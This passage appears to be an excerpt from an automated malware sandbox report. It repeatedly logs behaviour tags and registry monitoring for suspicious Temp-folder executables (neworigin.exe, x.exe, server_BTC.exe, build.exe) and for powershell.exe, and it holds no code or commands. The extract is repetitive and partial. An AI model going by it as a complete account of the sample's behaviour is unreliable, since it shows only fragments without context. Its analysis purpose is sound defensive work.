                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
